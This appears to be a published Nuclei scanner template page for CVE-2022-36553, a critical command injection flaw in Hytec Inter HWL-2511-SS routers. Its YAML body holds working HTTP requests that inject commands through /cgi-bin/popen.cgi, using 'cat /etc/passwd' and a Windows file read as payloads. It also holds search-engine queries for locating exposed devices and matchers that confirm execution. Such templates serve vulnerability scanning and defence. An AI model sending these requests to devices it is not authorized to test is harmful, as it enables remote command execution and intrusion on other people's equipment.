Hytec Inter HWL-2511-SS - Remote Command Execution
ID: CVE-2022-36553
Severity: critical
Author: HuTa0
Tags: cve2022,cve,hytec,rce
Description
Section titled “Description”Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.
YAML Source
Section titled “YAML Source”id: CVE-2022-36553
info: name: Hytec Inter HWL-2511-SS - Remote Command Execution author: HuTa0 severity: critical description: | Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-36553 - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/cellular-router-rce.yaml - https://gist.github.com/Nwqda/b27418ab801eb0b9cdbe8d042cb0249b - https://hytec.co.jp/eng/products/our-brand/hwl-2511-ss.html - https://hytec.co.jp/eng/wordpress/wp-content/uploads/2019/09/hwl-2511-ss-ds.3.0.pdf classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-36553 cwe-id: CWE-77 epss-score: 0.56895 epss-percentile: 0.97694 cpe: cpe:2.3:o:hytec:hwl-2511-ss_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: hytec product: hwl-2511-ss_firmware fofa-query: title="index" && header="lighttpd/1.4.30" zoomeye-query: app="Hytec Inter HWL-2511-SS" tags: cve2022,cve,hytec,rce
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | GET /cgi-bin/popen.cgi?command={{command}}&v=0.1303033443137912 HTTP/1.1 Host: {{Hostname}}
payloads: command: - "cat%20/etc/passwd" - "type%20C://Windows/win.ini" stop-at-first-match: true
matchers-condition: or matchers: - type: dsl dsl: - "regex('root:.*:0:0:', body)" - "contains(body_1, '<title>index</title>')" - "status_code == 200" condition: and
- type: dsl dsl: - "contains(body, 'bit app support')" - "contains(body, 'fonts')" - "contains(body, 'extensions')" - "status_code == 200" - "contains(body_1, '<title>index</title>')" condition: and# digest: 4a0a00473045022100a21740c9c071644352269c7d9ca5c0d30d4c8b48fe8cadd4f4919ba25ceb7612022005059a6ad788362e9f8b157bfc20fb61b064a794efe995978e58f17f2a2e1d76:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-36553.yaml"